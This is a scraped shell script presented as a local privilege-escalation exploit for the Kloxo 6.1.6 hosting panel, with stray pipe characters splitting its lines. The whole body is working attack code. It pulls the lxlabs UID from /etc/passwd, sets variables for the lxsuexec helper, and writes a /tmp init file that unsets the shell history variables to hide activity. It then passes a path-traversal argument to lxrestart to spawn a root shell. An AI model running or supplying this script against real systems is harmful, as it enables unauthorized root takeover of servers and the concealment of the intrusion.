更新时间:2022-09-10 23:12:18
#!/bin/sh |
# Exploit Title: Kloxo Local Privilege Escalation |
# Google Dork: inurl:kiddies |
# Date: August 2012 or so |
# Exploit Author: HTP |
# Vendor Homepage: http://lxcenter.org/ |
# Software Link: [download link if available] |
# Version: 6.1.6 (Latest) |
# Tested on: CentOS 5 |
# CVE : None |
# This exploit requires you to be the Apache user, or another capable of running lxsuexec. |
LXLABS=` cat
/etc/ passwd
| grep lxlabs |
cut -d: -f3`
|
export
MUID=$LXLABS
|
export
GID=$LXLABS
|
export
TARGET=/bin/sh
|
export
CHECK_GID=0
|
export
NON_RESIDENT=1
|
echo
"unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc
|
echo
"/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' "
> /tmp/lol
|
lxsuexec /tmp/lol |